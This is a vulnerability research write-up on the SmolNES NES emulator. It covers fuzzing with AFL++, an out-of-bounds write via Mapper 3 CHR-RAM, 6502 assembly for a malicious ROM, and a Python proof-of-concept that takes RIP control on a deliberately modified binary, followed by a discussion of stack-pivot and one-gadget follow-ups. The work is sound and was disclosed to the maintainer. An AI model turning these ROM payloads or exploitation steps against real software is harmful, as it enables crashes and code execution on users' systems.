Skip to content

NES

1 post with the tag “NES”

Vulnerability Research on SmolNES

The SmolNES emulator contains multiple memory safety vulnerabilities, including an Out-Of-Bounds Write via Mapper 3 (CHR-RAM) that leads to arbitrary memory corruption when loading a malicious ROM.

In practice, only availability is definitively impacted: a malicious ROM can trigger a reproducible crash. In SmolNES’s memory layout, the GOT and the heap are out of reach, and no exploitable function pointer exists within the range reachable by the overflow.

That said, it makes for an excellent case study, directly transferable to more critical targets with a favorable memory layout: section 9 demonstrates RIP control in a modified binary built to simulate that scenario.


  1. Background and target selection
  2. Setting up the fuzzing environment
  3. First results: initial crashes
  4. Lead 1: OOB Read in PRG-ROM (abandoned)
  5. Source code analysis
  6. Fuzzing iterations and optimizations
  7. Discovering the real vulnerability
  8. Memory mapping and exploitation attempt
  9. PoC on modified binary: RIP control
  10. Responsible Disclosure and CVE
  11. Appendix: Required NES concepts
  12. Resources

SmolNES GitHub page, 776 stars and 3 contributors

The source code is available on GitHub (binji/smolnes).

SmolNES is a NES (Nintendo Entertainment System) emulator written in roughly 700 lines of “golf” C in deobfuscated.c (intentionally compact code). A few characteristics make it an ideal target:

  • Trivially AFL-fuzzable interface: the program takes a single .nes ROM as its argument (./smolnes <rom.nes>). It’s enough to feed AFL++ with binary files, then pass the generated files directly into smolnes.
  • Small codebase: the developer explicitly prioritized compactness (the tagline is “NES emulator in <5000 bytes of C”), which almost certainly means bounds checking was skipped.
  • Hidden complexity: the NES is a complex machine (6502 CPU, PPU, Mapper system). It would be surprising if a project like this, with no security focus, had no bugs.
  • Few maintainers: the project has only 3 contributors, it’s unlikely any vulnerability research has been done on it before.

The main attack surface identified right away is the iNES file header (the first 16 bytes of a ROM), which configures critical parameters such as memory bank sizes, mapper type, and graphics mode.


The SmolNES source includes two versions:

  • smolnes.c: the official “golfed” version (unreadable)
  • deobfuscated.c: a readable version with explanatory comments, this is the one I used for research

Two modifications are made to deobfuscated.c before compiling for fuzzing:

  1. Removing SDL calls (Simple DirectMedia Layer, the graphics/audio library): SDL initialization, window creation, rendering, and event polling are commented out. Without this, the program would try to open a window on every execution, making fuzzing too slow to be viable.

  2. Capping the CPU cycle count: a limit is added to the main loop. Without this, a valid ROM would run the emulator forever.

The instrumented binary is compiled using the environment variables from the provided Makefile:

Fenêtre de terminal
CC=afl-clang-lto make

afl-clang-lto (Link-Time Optimization) is AFL++‘s highest-performance compiler mode: it inserts instrumentation at link time, yielding better coverage and throughput than afl-cc or afl-clang-fast.

Free-to-use NES ROMs from the EmuDeck homebrew repository are used as the initial corpus. AFL++ will mutate them automatically to explore new execution paths.

Fenêtre de terminal
afl-fuzz -i games/ -o output_dir/ -- ./smolnes_instru/deobfuscated @@
AFL++ TUI iteration 1: exec speed ~1500/sec, stability 100%, first crashes

The metrics are promising:

  • ~1500 execs/sec: removing SDL was a success
  • stability 100%: the emulator is deterministic, which is essential for effective fuzzing

AFL++ finds its first crashes quickly. Within minutes, 3 unique crash files are saved in output_dir/default/crashes/. After this initial burst, no new unique crashes appear despite dozens of additional minutes of fuzzing.

sig:11 (SIGSEGV) is present on all crashes, indicating an invalid memory access.


4. Lead 1: OOB Read in PRG-ROM (abandoned)

Section titled “4. Lead 1: OOB Read in PRG-ROM (abandoned)”

The first crash is loaded into GDB for analysis.

GDB crash OOB Read: fatal instruction movzx, $rax=0x3ffffc
→ movzx r15d, BYTE PTR [rax+rcx*1+0x10]
; deobfuscated.c:234 : return rom[(prg[hi - 8 >> prgbits - 12] & ...) << prgbits | ...]
; mem(lo=0xfc, hi=0xf, val=0x0, write=0x0), reason: SIGSEGV

This corresponds to the following code:

// deobfuscated.c
return rom[(prg[hi - 8 >> prgbits - 12] & (rombuf[4] << 14 - prgbits) - 1)
<< prgbits |
addr & (1 << prgbits) - 1];

The emulator attempts to read at index 4,194,300 in rom[], a buffer with a maximum size of 1 MB: this is an Out-Of-Bounds Read.

Root cause: rombuf[4] (5th byte of the iNES header, number of PRG banks) was set to 0x00 by AFL. The emulator then initializes:

prg[1] = rombuf[4] - 1;
// If rombuf[4] == 0 : 0 - 1 = 255 (unsigned underflow)

The PRG-ROM read computation becomes prg[1] * 0x4000 + offset = 255 * 0x4000 + 0x3FFC = 0x3FFFFC, which is exactly the $rax value observed.

Why this lead is abandoned: this crash happens at the very start of execution, during the Reset Vector read (the game’s first instruction). It causes an immediate crash (DoS), but there is no control over the value read or the target address. Additionally, this bug blocks AFL: nearly every mutation generates this same immediate crash, the emulator never actually starts, and AFL cannot explore the deeper execution paths that are of interest.


Before optimizing the fuzzer, it’s necessary to understand the code in order to target the right execution paths. This is a good moment to read the appendix covering the NES architectural concepts, as things get fairly dense from here.

The code is built around a single large main function that contains the emulator’s main loop, plus a few helper functions.

// deobfuscated.c
SDL_RWread(SDL_RWFromFile(argv[1], "rb"), rombuf, 1024 * 1024, 1);
// The full ROM file is loaded into rombuf[1024*1024]
rom = rombuf + 16; // Game code starts after the 16-byte header
prg[1] = rombuf[4] - 1; // Index of the last PRG bank (header byte 4)
// Header byte 5: number of CHR-ROM banks in the file
// If 0: the game has no CHR-ROM, it uses CHR-RAM (8 KB of RAM)
// v--- CHR-RAM mode: chrrom = chrram[8192]
chrrom = rombuf[5] ? rom + (rombuf[4] << 14) : chrram;
// ^--- CHR-ROM mode: chrrom points into the file

chrrom is the base pointer for graphics data access. Its value (either pointing into the ROM file or into chrram) is the pivot of the vulnerability.

// deobfuscated.c
uint8_t *get_chr_byte(uint16_t a) {
return &chrrom[chr[a >> chrbits] << chrbits | a % (1 << chrbits)];
}

The parameter a is a 14-bit VRAM address (value between 0 and 16383), representing a position in the PPU’s graphics address space. The variable V plays this role during an access from $2007.

The formula is compact. To understand it, note that a >> chrbits (with chrbits=12) extracts the most significant bit of a on 13 bits, which encodes the bank number. In standard CHR-RAM mode, a is bounded to $0000-$1FFF (8192 values) before the call: a >> 12 can therefore only be 0 or 1, selecting one of the two 4 KB banks. It’s chr[bank_index] that can exceed 1 (the heart of the vulnerability). The << chrbits shift reconstructs the bank base address, and the modulo recovers the intra-bank offset:

// Equivalent readable version (with chrbits = 12, bank size = 4096 bytes):
uint8_t *get_chr_byte_readable(uint16_t a) {
uint8_t bank_index = chr[a >> 12]; // bits 12-15 of 'a' -> bank number
uint32_t bank_base = bank_index << 12; // bank_index * 4096
uint16_t offset = a & 0xFFF; // bits 0-11 of 'a' -> offset within bank
return &chrrom[bank_base + offset];
}

chr[] is an array of graphics bank indices, updated by the Mappers. In CHR-RAM mode, chrrom == chrram and chrram is only 8192 bytes (2 banks of 4096). If bank_index >= 2, then bank_base >= 8192, and the returned pointer goes past the end of chrram.

mem() emulates all 6502 CPU memory accesses. It takes the address (hi:lo), the value to write (val), and the operation direction (write).

// deobfuscated.c (excerpt)
uint8_t mem(uint8_t lo, uint8_t hi, uint8_t val, uint8_t write) {
uint16_t addr = hi << 8 | lo;
switch (hi >>= 4) { // Divide hi by 16 to get the memory "region"
case 0: case 1: // Region $0000-$1FFF: internal RAM (2 KB, mirrored over 8 KB)
// The NES physically has only 2 KB of RAM ($0000-$07FF). The remaining 6 KB
// ($0800-$1FFF) are mirrors: accessing $0800 or $0000 reads the same physical byte.
return write ? ram[addr] = val : ram[addr];
case 2: case 3: // Region $2000-$3FFF: PPU registers (mirrored)
// The 8 PPU registers ($2000-$2007) are mirrored across the entire $2000-$3FFF range.
// lo &= 7 keeps only the 3 low bits, mapping any address in this range to its
// corresponding PPU register.
// Ex: $2015 -> 0x15 & 7 = 5 -> register $2005 (ppuscroll).
lo &= 7;
if (lo == 7) { // Register $2007 = PPUDATA (PPU data port)
// The PPU has a one-cycle read delay: reading $2007 does not immediately return
// the value at address V, but the value from the previous cycle, stored in ppubuf.
// The current read is buffered for the next access.
// Exception: the palette ($3F00+) is returned without buffering.
// That's why tmp = ppubuf at the start and return tmp at the end.
tmp = ppubuf;
uint8_t *rom =
// If V points into the Pattern Table area (0x0000-0x1FFF):
V < 8192 ? write && chrrom != chrram
? &tmp // Write to CHR-ROM: ignore
// (tmp serves as a bit bucket; CHR-ROM
// is read-only on real hardware)
: get_chr_byte(V) // Write to CHR-RAM or any read
// If V points into the Nametable area (0x2000-0x3EFF):
: V < 16128 ? get_nametable_byte(V)
// Otherwise: Palette area (0x3F00+)
: palette_ram + (uint8_t)((V & 19) == 16 ? V ^ 16 : V);
write ? *rom = val : (ppubuf = *rom); // Actual write or read
V += ppuctrl & 4 ? 32 : 1; // V auto-increments after each $2007 access
V %= 16384; // V stays within the PPU address space (14 bits = 2^14 = 16384)
return tmp;
}
// ... handling of other PPU registers ($2000 ppuctrl, $2006 ppuaddr, etc.)
case 4: // Region $4000-$4FFF: APU and I/O registers
// $4016: joypad read (keyboard state in the emulator)
for (tmp = 0, hi = 8; hi--;)
tmp = tmp * 2 + key_state[...]; // key_state = pointer to keyboard state
case 6: case 7: // Region $6000-$7FFF: PRG-RAM (optional cartridge RAM)
// Two distinct memories, two distinct roles:
// - Internal RAM ($0000-$1FFF): 2 KB soldered on the motherboard. Game variables,
// 6502 stack. Present on every NES.
// - PRG-RAM ($6000-$7FFF): optional 8 KB ON the cartridge. Absent from most games.
// When present, often battery-backed to save progress (Zelda, Metroid).
addr &= 8191; // Keep the 13 low bits (0x1FFF) to address prgram[8192]
return write ? prgram[addr] = val : prgram[addr];
default: // Region $8000-$FFFF: ROM + Mapper handling
// IMPORTANT: writes to the ROM region do not modify the ROM.
// They are intercepted and interpreted as commands to the Mapper.
if (write)
switch (rombuf[6] >> 4) { // Mapper number
case 7: // Mapper 7 (AxROM)
// ...
case 4: // Mapper 4 (MMC3)
// ...
case 3: // Mapper 3 (CNROM): CHR bank switching only
chr[0] = val % 4 * 2; // Even bank (0, 2, 4, or 6)
chr[1] = chr[0] + 1; // Next odd bank (1, 3, 5, or 7)
break;
case 2: // Mapper 2 (UNROM)
// ...
case 1: // Mapper 1 (MMC1)
// ...
}
return rom[(prg[hi - 8 >> prgbits - 12] & (rombuf[4] << 14 - prgbits) - 1)
<< prgbits |
addr & (1 << prgbits) - 1];
}
return ~0;
}

Key points identified for the vulnerability:

  1. Register $2007 (PPUDATA): this is the PPU’s data port. Writing to $2007 from 6502 code triggers a VRAM write, whose destination is computed by get_chr_byte(V). V is the PPU’s internal address cursor, controlled by writes to $2006 (PPUADDR).

  2. Mapper 3: any write anywhere in $8000-$FFFF modifies chr[0] without bounds checking. With val=0x01 (or any val such that val % 4 == 1), chr[0] = 0x01 % 4 * 2 = 2.

  3. The partial safety check: write && chrrom != chrram ? &tmp : get_chr_byte(V). If chrrom == chrram (CHR-RAM mode), the write goes through get_chr_byte with no bounds check on the bank index. This is the only case where a write can go out of bounds.


Iteration 1: SDL removal + cycle cap (result: 3 crashes, then stall)

Section titled “Iteration 1: SDL removal + cycle cap (result: 3 crashes, then stall)”

The first harness version simply removes SDL graphics calls and adds a cycle limit. AFL++ quickly finds 3 unique crashes (all related to the OOB Read in PRG-ROM described in section 4), then stalls.

Reason for the stall: the emulator crashes too early. When rombuf[4]=0, the NES CPU never really starts: it reads an invalid Reset Vector and immediately tries to access 4 MB of PRG-ROM. AFL cannot explore the deeper execution paths (like the 6502 code that writes to $2007).

Iteration 2: header patches + ASAN + 6502 dictionary

Section titled “Iteration 2: header patches + ASAN + 6502 dictionary”

Knowing the code better, several additional modifications are made.

Header patches in the harness (applied after reading the file):

// Prevent PRG underflow and the immediate $FFFC crash
if (rombuf[4] == 0 || rombuf[4] > 64) rombuf[4] = 1;
// Force CHR-RAM mode: chrrom = chrram, which activates the path through get_chr_byte()
rombuf[5] = 0;
// Force Mapper 3 (CNROM), preserve the mirroring bit
rombuf[6] = (rombuf[6] & 0x01) | 0x30;

These three patches steer AFL toward the vulnerable path:

  • rombuf[4] clamped: prevents the immediate PRG crash
  • rombuf[5] = 0: ensures chrrom == chrram, a necessary condition for the OOB Write
  • rombuf[6] = 0x3X: forces Mapper 3, enabling CHR bank switching without bounds checking

Note on rombuf[4] > 64: the value is capped at 64 banks maximum. This limit exactly matches the rombuf buffer size (1 MB / 16 KB per bank = 64 banks). Beyond that, index calculations would exceed the allocated megabyte. This is not an official NES limit (real NES ROMs have at most 32 PRG banks), it’s a safety bound derived from the buffer size.

Compiling with ASAN:

Fenêtre de terminal
AFL_USE_ASAN=1 CC=afl-clang-lto make

Without ASAN, an OOB Write will silently write into adjacent memory without an immediate crash if the overwritten region contains data the process can read. ASAN detects the out-of-bounds access at the very first overflowed byte, making the crash systematic.

The trade-off is a performance drop: ~300 execs/sec instead of ~1500. Further optimizations could improve this, but it wasn’t necessary given that enough crashes were found at this reduced speed.

AFL++ dictionary (nes6502.dict):

# iNES header
magic="NES\x1a"
mapper3="\x30"
# 6502 write opcodes
op_sta_abs="\x8D"
op_stx_abs="\x8E"
# NES register addresses
ppu_addr="\x06\x20" # $2006: PPUADDR
ppu_data="\x07\x20" # $2007: PPUDATA
mapper_reg="\x00\x80" # $8000: Mapper 3 register
#...
# The actual dictionary I used was considerably larger

Without the dictionary, AFL has to stumble upon the sequence 8D 07 20 (STA $2007) by chance among 16,777,216 possible 3-byte combinations. With the dictionary, it inserts it directly.

Surface bug hotfixes:

Two additional bugs were identified and hotfixed in the harness to let ASAN reach the target bug:

  • OOB Write in palette_ram: the index (uint8_t)(...) can be up to 255, but palette_ram is only 64 bytes. Hotfix: & 63 to clamp the index.
  • OOB Read in PRG-ROM: the computed index in the PRG formula can exceed 1 MB. Hotfix: add a bounds check before the return.

Both bugs are real (confirmed on legitimate, unmodified ROMs), but of lesser interest: the first is a write with a limited range (~191 bytes maximum), the second is a read with no control over the value returned.

Result: AFL++ finds the CHR-RAM OOB Write crash very quickly.

AFL++ TUI iteration 2: CHR-RAM OOB Write crash found with ASAN + dictionary + header patches

7. Discovering the real vulnerability: OOB Write via Mapper 3 CHR-RAM

Section titled “7. Discovering the real vulnerability: OOB Write via Mapper 3 CHR-RAM”

With the patched binary (ASAN + forced Mapper 3 + forced CHR-RAM), AFL++ produces a new type of crash. Replayed under GDB with ASAN, it reveals:

ASAN: global-buffer-overflow WRITE 0 bytes after chrram
==ERROR: AddressSanitizer: global-buffer-overflow
WRITE of size 1 at 0x55555628c9a0 thread T0
#0 in mem deobfuscated.c:92
0x55555628c9a0 is located 0 bytes after global variable 'chrram' (size 8192)

Unlike the previous crashes (READ), this one is a WRITE. It lands exactly at chrram[8192], the first byte past the end of the array.

The stack trace (#0) points to line 92 of mem():

write ? *rom = val : (ppubuf = *rom); // line 92

Here, rom is the pointer returned by get_chr_byte(V), whose value has gone past the bounds of chrram. ASAN interrupts execution at the exact moment of the write.

Root cause: get_chr_byte() without bounds checking

Section titled “Root cause: get_chr_byte() without bounds checking”

In CHR-RAM mode (chrrom == chrram, from rombuf[5] = 0) with Mapper 3 active (rombuf[6] >> 4 == 3), any CPU write to $8000-$FFFF modifies the CHR banks:

case 3: // mapper 3
chr[0] = val % 4 * 2;
chr[1] = chr[0] + 1;
break;

val is entirely controlled by the ROM. The possible values of chr[0] and their consequences:

val writtenchr[0]base offset into chrramout-of-bounds?OOB range
val%4 = 000no-
val%4 = 128192yes+4095 B
val%4 = 2416384yes+12287 B
val%4 = 3624576yes+20479 B

There is no check that chr[0] stays within the physical bounds of chrram.

Three conditions, all satisfiable by a malicious ROM:

  1. rombuf[5] == 0 (iNES header byte 5, controlled by the ROM): enables CHR-RAM mode
  2. rombuf[6] >> 4 == 3 (high nibble of header byte 6, controlled by the ROM): enables Mapper 3
  3. The PPU writes via $2007 with V in $0000-$1FFF after a Mapper write that set chr[0] >= 2

The target address is fully derivable from two controllable parameters:

address = &chrram[ chr[V >> 12] * 4096 + (V & 0xFFF) ]
  • val written to $8000+: determines chr[0] (0, 2, 4, or 6)
  • V: positioned by two consecutive writes to $2006

Granularity is one byte. The written value (from the 6502’s A, X, or Y register) is also controlled by the ROM.

The following sequence triggers an OOB Write at the first byte after chrram. iNES header: 1 PRG bank (rombuf[4] = 1), 0 CHR banks (rombuf[5] = 0), Mapper 3 (rombuf[6] = 0x30).

; Entry point (Reset Vector at $FFFC points here)
; Step 1: select the CHR bank via Mapper 3
; val=1 => chr[0] = 1%4*2 = 2 => base offset = 2*4096 = 8192 (first OOB byte)
LDA #$01 ; $A9 $01
STA $8000 ; $8D $00 $80 -> Mapper 3: chr[0]=2, chr[1]=3
; Step 2: set V via two consecutive writes to $2006
LDA #$00 ; $A9 $00
STA $2006 ; $8D $06 $20 (high byte: $00)
LDA #$00 ; $A9 $00
STA $2006 ; $8D $06 $20 (low byte: $00) => V = $0000
; Step 3: write via $2007 (PPUDATA)
; get_chr_byte($0000) = &chrram[2*4096 + 0] = &chrram[8192] -> OOB
LDA #$41 ; $A9 $41 (value to write)
STA $2007 ; $8D $07 $20 -> WRITE to chrram[8192]

To target a different offset:

target (offset from start of chrram)val at $8000V via $2006
8192 + N (N < 4096)$01 (chr[0]=2)$0000-$0FFF
16384 + N (N < 4096)$02 (chr[0]=4)$0000-$0FFF
24576 + N (N < 4096)$03 (chr[0]=6)$0000-$0FFF

8. Memory mapping and exploitation attempt

Section titled “8. Memory mapping and exploitation attempt”
GDB: addresses of global variables in the .bss section

The order of global variables in memory (.bss section, confirmed via GDB on the release binary):

0x55555567a220 chrram [8192 bytes] <- start of the overflow region
0x55555567c220 ram [8192 bytes]
0x55555567e220 palette_ram [64 bytes]
0x55555567e260 vram [2048 bytes]
0x55555567ea60 ptb_lo [1 byte]
0x55555567ea70 addr_lo [1 byte]
0x55555567ea80 prg [4 bytes]
0x55555567ea90 rom [8 bytes] (pointer)
...

Maximum overflow range with Mapper 3: chr[0] max = 6, range = 6 * 4096 + 4095 = 28671 bytes beyond the start of chrram, i.e. ~20 KB out-of-bounds.

The natural first target for an OOB Write is the GOT (Global Offset Table), which holds the addresses of libc functions. Overwriting a GOT entry redirects a function call to arbitrary code.

GDB: GOT located before the .bss section, out of reach
gef➤ p/d 0x555555559fc0 - 0x55555567a220 # GOT - chrram
$5 = -1180256 # Negative value (~-1.1 MB)

The GOT is located approximately 1.1 MB before chrram in memory. Since the OOB Write can only reach addresses at positive offsets from chrram, the GOT is inaccessible.

The heap (dynamically allocated by SDL at startup) is another potential target: it may contain function pointers or exploitable allocator metadata.

Distance chrram -> heap start: 0x23e749f0 ~ 574 MB

As expected, ASLR places the heap several hundred megabytes away from the .bss section. The maximum OOB range (~20 KB with Mapper 3) is nowhere near that distance.

In the ~20 KB reachable after chrram, the variables present are integer arrays (ram, palette_ram, vram) and scalars (ptb_lo, addr_lo, 6502 registers, prg). Overwriting them disrupts emulation but provides no useful primitive: no function pointer is present in this region.

One variable stands out, though: the pointer *rom, located ~18 KB after chrram. It points to the start of the PRG data inside rombuf and is used for offset calculations. Overwriting it would change the base for address arithmetic, potentially enabling access to arbitrary memory, but it would also alter where instructions are read from. This primitive self-destructs upon use.

  • Guaranteed DoS: reproducible crash with a malicious .nes ROM, confirmed via ASAN
  • Memory corruption: up to ~20 KB of global variables can be overwritten, disrupting emulation arbitrarily
  • Direct RCE: not achievable with this memory layout (GOT and heap out of reach, no function pointer in the reachable region)

SmolNES’s memory layout contains no function pointer within the overflow’s reach. To illustrate the vulnerability’s potential in a favorable scenario, a function pointer is manually added to deobfuscated.c’s source, in the .bss section immediately after chrram. This pointer does not exist in the original binary. A malicious ROM overwrites it with 0xdeadbeef, giving control of RIP (the instruction pointer register on x86_64) on the next call.

The modification spans three files. The function pointer is declared in a separate compilation unit (poc_hook.c) to ensure the linker places its .bss after that of deobfuscated.o, and therefore at a higher address than chrram.

poc_hook.h:

typedef void (*render_hook_t)(void);
extern render_hook_t render_hook;

poc_hook.c:

typedef void (*render_hook_t)(void);
render_hook_t render_hook;

Full diff:

diff --git a/Makefile b/Makefile
--- a/Makefile
+++ b/Makefile
@@ -18,8 +18,8 @@
-deobfuscated: deobfuscated.c
- $(CC) -O2 -o $@ $< ${SDLFLAGS} -g ${WARN}
+deobfuscated: deobfuscated.c poc_hook.c
+ $(CC) -O2 -o $@ deobfuscated.c poc_hook.c ${SDLFLAGS} -g ${WARN}
diff --git a/deobfuscated.c b/deobfuscated.c
--- a/deobfuscated.c
+++ b/deobfuscated.c
@@ -1,5 +1,6 @@
#include <SDL2/SDL.h>
#include <stdint.h>
+#include "poc_hook.h"
@@ -691,6 +691,8 @@
SDL_RenderPresent(renderer);
+ // [POC] Call render hook if defined
+ if (render_hook) render_hook();
// Handle SDL events.

Two points to note:

  • Makefile: poc_hook.c is added as an explicit source. The linker places poc_hook.o’s .bss after deobfuscated.o’s, guaranteeing that render_hook ends up at an address higher than all variables in deobfuscated.c, including chrram.
  • Call site: the hook is called after each SDL_RenderPresent, i.e. once per frame (scanline 241). That’s the natural moment for an emulator to expose this kind of callback.

This pattern is realistic: many emulators expose such callbacks for debugging tools, save states, or GUI frontends.

The ROM is generated by the make_poc_rom.py script (see Resources). It takes the offset of render_hook from chrram in the target binary’s .bss, then writes the 8 bytes of 0xdeadbeef via successive writes to $2007, incrementing V by 1 each time (auto-increment after each PPUDATA access).

GDB showing RIP = 0xdeadbeef

RIP is controlled. The emulator jumped to the address supplied by the malicious ROM.

Controlling RIP is not enough to execute arbitrary code on a modern system: ASLR and the NX bit are highly effective mitigations.

Two classic approaches to go further:

Option 1: One-gadget

A “one-gadget” is a gadget in libc that, when called, executes execve("/bin/sh", NULL, NULL) if certain register conditions are met. Pointing render_hook at this gadget would yield a shell without a ROP chain, given a libc address leak is available to bypass ASLR. In a real-world context, the end goal is usually not a local shell but persistence or remote access; the one-gadget remains a valid tool, it’s the post-exploitation action that changes.

Option 2: Stack pivot into rombuf

The real alternative is a stack pivot: find a gadget that places rsp (the stack pointer) into a memory region whose contents we control. rombuf is a 1 MB array (fully controlled by the malicious ROM) located in .bss. A gadget of the form mov rsp, [address_in_bss] ; ret would pivot the stack into rombuf and allow executing an arbitrary ROP chain, leading to code execution. This scenario is reinforced by the fact that rom is a global pointer (in .bss) that already points into rombuf: a gadget dereferencing this known address is enough to place rsp in the controlled region.


The vulnerabilities described in this write-up were reported to the project’s maintainer (binji/smolnes) by email before this article was published. His response, unsurprisingly for a code golf project, was that he “wasn’t too worried about OOB in smolnes”. He authorized me to publish this write-up.

These vulnerabilities technically meet the criteria for CVE assignment: they are reproducible, documented, and the impact (guaranteed DoS, memory corruption) is real.

However, filing a CVE would have been counterproductive in this case. SmolNES is a hobby code golf project with 3 contributors, designed as a compactness exercise and not intended for production deployment. There is no proven critical exploitation path in the binary as distributed (the GOT and heap are out of reach, no function pointer exists in the reachable region).

Given the nature of the project and the absence of a critical exploitation path, I decided not to pollute the ecosystem with a pointless CVE.

This aligns with what this article describes well: CVSS scores are calculated for the worst-case deployment scenario, regardless of actual context. The author himself acknowledges that some CVEs “have no viable exploitation path or deployment, and frankly waste everyone’s time.” A hobby NES emulator is the perfect example.


This appendix covers the NES architectural concepts required to understand the vulnerability.


The NES (Nintendo Entertainment System, 1983) is made up of three main components:

  • CPU: a Ricoh 2A03, derived from the MOS Technology 6502. 8-bit processor, 16-bit address bus (64 KB address space).
  • PPU (Picture Processing Unit): the Ricoh 2C02, handles display. It has its own 16 KB address space, separate from the CPU’s.
  • APU (Audio Processing Unit): integrated into the CPU, handles sound (5 channels).

The game is stored on a cartridge containing two types of memory:

  • PRG-ROM: the game code and program data (read by the CPU via $8000-$FFFF)
  • CHR-ROM or CHR-RAM: the graphics data (tiles, sprites), accessed by the PPU

The CPU addresses 64 KB (0x0000 to 0xFFFF), broken down as follows:

$0000 - $07FF : Internal RAM (2 KB, mirrored over $0000-$1FFF)
$2000 - $2007 : PPU registers (mirrored across the entire $2000-$3FFF range)
$4000 - $4017 : APU and I/O registers (joypads, DMA)
$6000 - $7FFF : PRG-RAM (optional cartridge RAM)
$8000 - $FFFF : PRG-ROM (game code) + Mapper registers

The Reset Vector: when the NES powers on, the CPU reads the two bytes at $FFFC-$FFFD and jumps to the address they contain. That’s the game’s entry point.

6502 instructions relevant to the vulnerability:

  • LDA #val (opcode A9): loads an immediate value into accumulator A
  • STA $addr (opcode 8D + 2 little-endian bytes): writes A to absolute memory
  • INC $addr,X (opcode FE + 2 bytes): reads, increments, and writes back the memory value (Read-Modify-Write)

prg[] and memory windows:

prg is an array whose elements contain the number of a PRG bank currently mapped into CPU memory. A PRG bank is 16 KB. Example:

prg[0] = 2; // the $8000-$BFFF range points to bank 2 of the ROM
prg[1] = 5; // the $C000-$FFFF range points to bank 5 of the ROM

The PPU manages the display through its own 16 KB address space:

$0000 - $1FFF : Pattern Tables (CHR: 8x8 pixel tiles, 2 banks of 4 KB)
$2000 - $3EFF : Nametables (screen map)
$3F00 - $3FFF : Palette RAM (32 active colors)

Registers $2006 (PPUADDR) and $2007 (PPUDATA)

Section titled “Registers $2006 (PPUADDR) and $2007 (PPUDATA)”

The CPU cannot directly access VRAM. It communicates with the PPU through memory-mapped registers in the $2000-$2007 range:

$2006 (PPUADDR): sets the target address in VRAM via two consecutive writes (toggle controlled by bit W):

First write -> high byte of the address (stored in T, temporary register)
Second write -> low byte + copy of T into V (V = active address)
case 6: // $2006 PPUADDR
T = (W ^= 1)
? T & 0xff | val % 64 << 8 // 1st write: bits 8-13 of T
: (V = T & ~0xff | val); // 2nd write: bits 0-7 of T, then V = T

$2007 (PPUDATA): reads or writes one byte at the address pointed to by V. After each access, V auto-increments:

V += ppuctrl & 4 ? 32 : 1;
V %= 16384; // 16384 = 2^14: the PPU space is 14 bits wide (0 to 16383)

This auto-increment mechanism allows writing consecutive byte sequences to VRAM with only repeated STA $2007 instructions.


The NES only has 32 KB for PRG-ROM and 8 KB for CHR. But some games need much more (Super Mario Bros 3: 384 KB of PRG).

The solution: Mappers, extra chips inside the cartridge that enable bank switching. The CPU always sees the same addresses ($8000-$FFFF), but the Mapper can connect different chunks of the ROM to those addresses.

How the game controls the Mapper: writes to the ROM region ($8000-$FFFF) do not modify the ROM (read-only). This behavior is repurposed: writes are intercepted and interpreted as bank switching commands. This is Memory-Mapped I/O (MMIO).

In SmolNES, the Mapper number is encoded in bits 4-7 of iNES header byte 6 (rombuf[6] >> 4).


CHR-ROM: most games store their graphics in a dedicated ROM chip on the cartridge. Graphics are fixed. chrrom points into the ROM file buffer.

CHR-RAM: some games (such as Zelda II, Metroid) have no graphics chip. They use the NES’s internal RAM (8 KB), which allows them to modify their graphics dynamically. chrrom then points to chrram[8192].

In SmolNES, header byte 5 (rombuf[5]) determines the mode:

chrrom = rombuf[5] ? rom + (rombuf[4] << 14) : chrram;
// ^if != 0: CHR-ROM from the file ^if 0: CHR-RAM (static 8 KB)

This distinction is at the heart of the vulnerability: Mappers allow selecting among multiple CHR banks. In CHR-ROM mode, having multiple banks is normal : the ROM file can contain many. But in CHR-RAM mode, there are only 2 physical banks (0 and 1, i.e. 8 KB). Selecting bank 2 goes past the end of chrram[8192].


Mapper 3, also known as CNROM, is one of the simplest. It only manages the CHR bank. Any write to $8000-$FFFF changes the active graphics bank:

case 3: // mapper 3 (CNROM)
chr[0] = val % 4 * 2; // val % 4 gives 0, 1, 2, or 3; * 2 gives 0, 2, 4, or 6
chr[1] = chr[0] + 1; // Next bank: 1, 3, 5, or 7
break;
// CHR bank is selected in pairs (two 4 KB sub-banks)
// Bank 0: chr[0]=0, chr[1]=1 (offsets 0 and 4096 into chrram -> valid)
// Bank 1: chr[0]=2, chr[1]=3 (offsets 8192 and 12288 -> OVERFLOW if CHR-RAM)
// Bank 2: chr[0]=4, chr[1]=5 (offsets 16384 and 20480 -> even further)
// Bank 3: chr[0]=6, chr[1]=7 (offsets 24576 and 28672 -> maximum range)

In CHR-ROM mode, all these offsets are valid. In CHR-RAM mode, only offsets 0 and 4096 (bank 0) are valid.


A .nes file begins with a 16-byte header:

Offset Size Description
0 4 "NES\x1A" (magic number)
4 1 Number of PRG-ROM banks (16 KB each)
5 1 Number of CHR-ROM banks (8 KB each). 0 = CHR-RAM mode
6 1 Flags:
bit 0 : mirroring (0=horizontal, 1=vertical)
bit 1 : battery (persistent PRG-RAM)
bit 2 : trainer (512 bytes before PRG-ROM)
bits 4-7 : low nibble of Mapper number
7 1 Flags:
bits 4-7 : high nibble of Mapper number
8-15 8 Unused (base iNES format)

In SmolNES, these values are read from rombuf without validation and used directly to configure the emulator.

#!/usr/bin/env python3
"""
PoC ROM for smolnes: OOB Write via Mapper 3 CHR-RAM -> overwrite render_hook.
.bss layout (smolnes/deobfuscated binary compiled with poc_hook.c as second source):
chrram : offset 0 (8192 bytes)
render_hook : offset 18552 (8 bytes, uint8_t*)
Parameters:
- Mapper 3 active (rombuf[6] >> 4 == 3)
- CHR-RAM mode (rombuf[5] == 0) => chrrom = chrram
- val=2 written to $8000 => chr[0] = 2%4*2 = 4
- V = 0x0878 (via two $2006 writes)
- get_chr_byte(0x0878) = &chrram[chr[0]*4096 + 0x878] = &chrram[18552] = &render_hook
Target: write 0xDEADBEEF into render_hook (little-endian, 8 bytes).
Trigger: when scany==241, dot==1, smolnes calls render_hook() => SIGSEGV.
"""
TARGET_ADDR = 0xDEADBEEF
# ---- Parameter calculation ----
CHRRAM_SIZE = 8192
HOOK_OFFSET = 18552 # p/d (long)&render_hook - (long)&chrram
BANK_INDEX = HOOK_OFFSET // 4096 # = 4 (chr[0] to reach)
INTRA_OFFSET = HOOK_OFFSET % 4096 # = 2168 = 0x878
assert BANK_INDEX in [2, 4, 6], f"Bank {BANK_INDEX} not reachable with Mapper 3 (val%4*2)"
MAPPER_VAL = BANK_INDEX // 2 # val such that val%4*2 = BANK_INDEX => val = BANK_INDEX/2
# V = INTRA_OFFSET (using bank 0 to access via chr[0])
V = INTRA_OFFSET # 0x878
V_HIGH = (V >> 8) & 0x3F # high byte for $2006 (6 bits)
